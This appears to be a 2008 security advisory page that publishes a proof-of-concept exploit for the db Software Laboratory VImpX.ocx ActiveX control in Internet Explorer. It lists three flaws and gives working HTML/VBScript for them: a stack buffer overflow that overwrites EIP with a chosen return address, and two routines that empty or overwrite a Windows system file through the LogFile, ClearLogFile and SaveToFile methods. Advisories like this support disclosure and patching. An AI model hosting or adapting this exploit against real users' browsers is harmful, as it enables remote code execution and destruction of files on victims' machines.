db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities

2008.10.29
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4749 | CVE-2008-4750
CWE: CWE-Other

----------------------------------------------------------------------------- db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities url: http://www.dbsoftlab.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.net Info: File: VImpX.ocx v. 4.8.8.0 CLSID: {7600707B-9F47-416D-8AB5-6FD96EA37968} ProgID: VImpX.VImpAX Description: VImpAX Control Marked as: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data Vulnerbale method: Property Let LogFile As String Sub ClearLogFile Sub SaveToFile (ByVal FileName As String) Bug(s): #1 Passing an overly long string (more than 256 bytes), will lead into a stack based buffer overflow which allows arbitrary code execution #2 The "LogFile()" method doesn't check user supplied arguments so we can use it to store the file name we want to clear and then the "ClearLogFile()" to delete the content of the file #3 The "SaveToFile()" method doesn't check user supplied arguments so we can use it to overwrite the content of the file name passed as argument. This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='test' width='20' height='20'></object> <input language=VBScript onclick=bof() type=button value='Click here to start the Remote Buffer Overflow test' style="width: 361px; height: 24px" size=21> <input language=VBScript onclick=afd() type=button value='Click here to start the File Content Deletion test' style="width: 361px; height: 24px" size=21> <input language=VBScript onclick=afc() type=button value='Click here to start the File Content Corruption test' style="width: 361px; height: 24px" size=21> <script language='vbscript'> Sub bof buff = String(256,"A") EDI = unescape("BBBB") ESI = unescape("CCCC") EBX = unescape("DDDD") EIP = unescape("%C6%91%3A%7E") 'unescape("EEEE") buf2 = unescape("FFFFFFFFFFFFFFFFFFFF") memo = unescape("%00%00%01%00") rest = unescape("GGGG") + String(2000, "H") egg = buff + EDI + ESI + EBX + EIP + buf2 + memo + rest test.LogFile = egg End Sub Sub afd test.LogFile = "C:\WINDOWS\_system.ini" test.ClearLogFile MsgBox "Exploit completed..." End Sub Sub afc test.SaveToFile "C:\WINDOWS\_system.ini" MsgBox "Exploit completed..." End Sub </script>

References:

http://xforce.iss.net/xforce/xfdb/46096
http://www.securityfocus.com/bid/31907
http://www.milw0rm.com/exploits/6828


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top